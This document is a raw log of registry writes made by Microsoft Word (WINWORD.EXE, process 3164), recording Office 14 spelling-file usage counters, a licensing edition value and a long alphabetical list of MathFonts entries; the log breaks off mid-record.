HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1326252075
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1326252076
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1326252096
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1326252097
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1326252098
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1326252099
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1326252100
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1326252101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
1
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Fixedsys
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Sans Serif
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Serif
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
